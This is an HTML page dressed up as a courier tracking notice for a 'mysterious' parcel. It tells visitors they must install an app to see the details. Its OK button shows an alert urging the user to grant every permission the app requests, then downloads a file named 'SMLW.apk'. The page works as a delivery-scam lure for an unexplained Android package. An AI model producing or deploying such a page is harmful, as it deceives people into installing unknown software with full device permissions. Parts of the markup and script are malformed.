<!DOCTYPE html>

<html>
<head>
<meta charset="utf-8">
<title>神秘专车快递</title>
</head>
<body>
<link rel="stylesheet" href="./1GSAndroid.CSS">
<script src="./1GSAndroid.JS"></script>

<style>
body {
    background-color: #807C78;
}
</style>

    <style>
        #container {
            width: 700px; /* 容器宽度 */
            height: 250px; /* 容器高度 */
            border: 1px solid #00000; /* 容器边框 */
            position: relative; /* 相对定位 */
            overflow: hidden; /* 隐藏超出容器的部分 */
        }
        #image {
            position: absolute; /* 绝对定位 */
            width: 150px; /* 图片宽度 */
            left: 0; /* 初始位置 */
            transition: left 2s; /* 添加平滑过渡效果 */
			top: 150PX;
        }
    </style>


<div  class="Father_level_0">
  <div class="Father_level_title_LOGO">
      <aBT id="abc0"  class="DLC1BT">神秘专车快递</aBT>
  </div>
  
  <div  id="container">
    <img id="image" src="C1.png" alt="C1">
</div>
  
    <div class="IAMG_Android">
       <img  src="B1.png" >
  </div>
  
  <div  class="Father_level_1">
  <div class="Father_level_title_LOGO1">
      <aBT id="abc0"  class="DLC2BT">查询到当前包裹运输中</aBT>
  </div>
  
    <div class="Father_level_title_LOGO2">
      <aBT id="abc0"  class="DLC2BT">运单号：zc20240929</aBT>
  </div>
  
  <div class="Father_level_title_LOGO3">
      <aBT id="abc0"  class="DLC2BT">发件地：湖南省&#160;&#160;&#160;&#160;&#160;发件人：上海大哥</aBT>
  </div>
  
    <div class="Father_level_title_LOGO4">
      <aBT id="abc0"  class="DLC2BT">收件地：贵州省&#160;&#160;&#160;&#160;&#160;收件人：神秘人</aBT>
  </div>
  
  <div class="Father_level_title_LOGO5">
      <aBT id="abc0"  class="DLC2BT">温馨提示：稍后为你转详细查看界面 需要安装APP应用程序 请点击下方确定按钮 跳转安装</aBT>
  </div>
  
 <div  id="mbMB" onclick="language1_zh()" style="display:NONE;justify-content:center;" onmouseleave="HiddIAMG_Android_TX()" onmouseover="ShowIAMG_Android_TX()" class="Hover_effect_Android download_Android">
      <awin href="" >确&#160;&#160;&#160;定</awin>
  </div>
  </div>

</div>

<script>
    const image = document.getElementById('image');
    const container = document.getElementById('container');
    const containerWidth = container.clientWidth; // 获取容器宽度
    const imageWidth = image.clientWidth; // 获取图片宽度

    function moveImage() {
        // 向右移动图片
		image.style.opacity = 1; // 重新显示
        image.style.left = `${570}px`;

        // 等待移动完成后重置位置
        setTimeout(() => {
            image.style.left = `-${0}px`; // 重置位置到左侧
					 image.style.opacity = 0; // 重新显示
					 mbMB.style.display = 'flex';
        }, 2000); // 2秒后重置位置
    }

    // 初始化移动图片
    setInterval(moveImage, 4000); // 每4秒移动一次
</script>

<script>
    function language1_zh(){
	    window.alert("R_AND_M 团队:
			 这个弹窗是我写的 不关浏览器什么事 下载应用后 提示 需要权限 都点击允许 就可以了");
        window.location.href="SMLW.apk";
    }
</script>
 
</head>
</html>






